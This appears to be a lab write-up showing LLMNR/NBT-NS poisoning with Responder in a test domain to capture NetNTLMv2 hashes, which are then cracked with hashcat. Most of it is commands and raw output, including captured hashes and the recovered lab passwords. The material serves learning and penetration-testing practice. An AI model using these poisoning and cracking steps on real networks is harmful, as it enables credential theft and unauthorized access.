Grab hash using responder.py tool
Table of Contents
In this case, we will look into how we can use LLMNR to poisoning to get the hash for a specific user and crack that in order to gain access.
We have a domain called master.loc where the domain controller is dc1. The client workstation is client1.
LLMNR is a protocol which is used to discover any hosts present in the network. In our scenario, we will try to access a fileserver called wow.master.loc in order to trigger the LLMNR lookup and eventually grab that users hash.
Than we will proceed to cracking the hash.
──╼ $sudo responder -I enp0s8 --lm --disable-ess
[sudo] password for saitama:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [ON]
Force ESS downgrade [ON]
[+] Generic Options:
Responder NIC [enp0s8]
Responder IP [10.10.10.200]
Responder IPv6 [fe80::786e:5609:a419:fbc2]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-JDPERRKYLH5]
Responder Domain Name [R632.LOCAL]
Responder DCE-RPC Port [49484]
[+] Listening for events...
[*] [NBT-NS] Poisoned answer sent to 10.10.10.150 for name WOW.MASTER.LOC (service: File Server)
[SMB] NTLMv2 Client : 10.10.10.150
[SMB] NTLMv2 Username : notmaster\duser1
[SMB] NTLMv2 Hash : duser1::notmaster:33dc78a2456c40ec:D272469A091520ED30CAD7A3E76D4A81:0101000000000000653DB9E08D34DA01A085F7FC65CAC43F00000000020000000000000000000000
[*] Skipping previously captured hash for notmaster\duser1
[+] Exiting...
crack that hash#
┌─[✗]─[saitama@parrot]─[~/Desktop/alldumps/20231222_ntlm_crack]
└──╼ $hashcat -m 5600 ./hash1.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-AMD Ryzen 7 PRO 7840U w/ Radeon 780M Graphics, 2864/5793 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 2 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: DUSER1::notmaster:63ab4f52bfe5c023:96a45f46313d1897...000000
Time.Started.....: Fri Dec 22 09:18:44 2023 (6 secs)
Time.Estimated...: Fri Dec 22 09:18:50 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2571.4 kH/s (0.92ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 41%
Started: Fri Dec 22 09:18:18 2023
Stopped: Fri Dec 22 09:18:52 2023
┌─[✗]─[saitama@parrot]─[~/Desktop/alldumps/20231222_ntlm_crack]
└──╼ $
┌─[✗]─[saitama@parrot]─[~/Desktop/alldumps/20231222_ntlm_crack]
└──╼ $nano passwords.txt
┌─[saitama@parrot]─[~/Desktop/alldumps/20231222_ntlm_crack]
└──╼ $hashcat -m 5600 ./hash1.txt ./passwords.txt
hashcat (v6.2.6) starting
...
[SNIP]
...
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
DUSER1::notmaster:63ab4f52bfe5c023:96a45f46313d18979b7d7991e5d7500f:0101000000000000001b05076434da01323945816e5b73ff0000000002000800590044005a00520001001e00570049004e002d003400570055004e0055005200420033004e004100480004003400570049004e002d003400570055004e0055005200420033004e00410048002e00590044005a0052002e004c004f00430041004c0003001400590044005a0052002e004c004f00430041004c0005001400590044005a0052002e004c004f00430041004c0007000800001b05076434da01060004000200000008003000300000000000000000000000002000001028fcf78c0032b1a4dcb67ede3a65e72245aaa6a6beb593b109b4f07e10595b0a001000000000000000000000000000000000000900280063006900660073002f0077006f00770032002e006d00610073007400650072002e006c006f006300000000000000000000000000:dfgh@1234
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: DUSER1::notmaster:63ab4f52bfe5c023:96a45f46313d1897...000000
Time.Started.....: Fri Dec 22 09:21:17 2023 (0 secs)
Time.Estimated...: Fri Dec 22 09:21:17 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (./passwords.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12766 H/s (0.02ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4/4 (100.00%)
Rejected.........: 0/4 (0.00%)
Restore.Point....: 0/4 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: abcd@1234 -> dfgh@1234
Hardware.Mon.#1..: Util: 12%
Started: Fri Dec 22 09:21:16 2023
Stopped: Fri Dec 22 09:21:19 2023
interesting1#
Following hash was got from the intercept
[SMB] NTLMv2-SSP Client : fe80::19f1:b84c:143e:f139
[SMB] NTLMv2-SSP Username : NOTMASTER\duser3
[SMB] NTLMv2-SSP Hash : duser3::NOTMASTER:e32b3308707ba8c7:670B2D866B67133871D533380A918AF2:01010000000000008053451A064FDA01D32AA183F4D4C90E00000000020008004300490030004E0001001E00570049004E002D004B00560057004400520035005200530054003600380004003400570049004E002D004B0056005700440052003500520053005400360038002E004300490030004E002E004C004F00430041004C00030014004300490030004E002E004C004F00430041004C00050014004300490030004E002E004C004F00430041004C00070008008053451A064FDA01060004000200000008003000300000000000000001000000002000000D8752D02707A6628EF94176A3F540CF8378EE1618BEE71B5A9BB534699D7E760A001000000000000000000000000000000000000900160063006900660073002F007300640066007300640066000000000000000000
It is to be noted that this user does not exist and we need to try to crack to confirm.
┌─[✗]─[user@parrot]─[/tmp]
└──╼ $hashcat -m 5600 ./hash.txt ./password.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-skylake-avx512-AMD Ryzen 9 7900X 12-Core Processor, 2912/5889 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 2 MB
Dictionary cache built:
* Filename..: ./password.txt
* Passwords.: 5
* Bytes.....: 53
* Keyspace..: 5
* Runtime...: 0 secs
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
DUSER3::NOTMASTER:e32b3308707ba8c7:670b2d866b67133871d533380a918af2:01010000000000008053451a064fda01d32aa183f4d4c90e00000000020008004300490030004e0001001e00570049004e002d004b00560057004400520035005200530054003600380004003400570049004e002d004b0056005700440052003500520053005400360038002e004300490030004e002e004c004f00430041004c00030014004300490030004e002e004c004f00430041004c00050014004300490030004e002e004c004f00430041004c00070008008053451a064fda01060004000200000008003000300000000000000001000000002000000d8752d02707a6628ef94176a3f540cf8378ee1618bee71b5a9bb534699d7e760a001000000000000000000000000000000000000900160063006900660073002f007300640066007300640066000000000000000000:duser@1234
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: DUSER3::NOTMASTER:e32b3308707ba8c7:670b2d866b671338...000000
Time.Started.....: Wed Jan 24 20:50:14 2024 (0 secs)
Time.Estimated...: Wed Jan 24 20:50:14 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (./password.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 139 H/s (0.01ms) @ Accel:512 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5/5 (100.00%)
Rejected.........: 0/5 (0.00%)
Restore.Point....: 0/5 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: abcd@1234 -> duser@3456
Started: Wed Jan 24 20:49:59 2024
Stopped: Wed Jan 24 20:50:15 2024
┌─[user@parrot]─[/tmp]
└──╼ $cat ./password.txt
abcd@1234
efgh@1234
duser@1234
duser@2345
duser@3456
Read other posts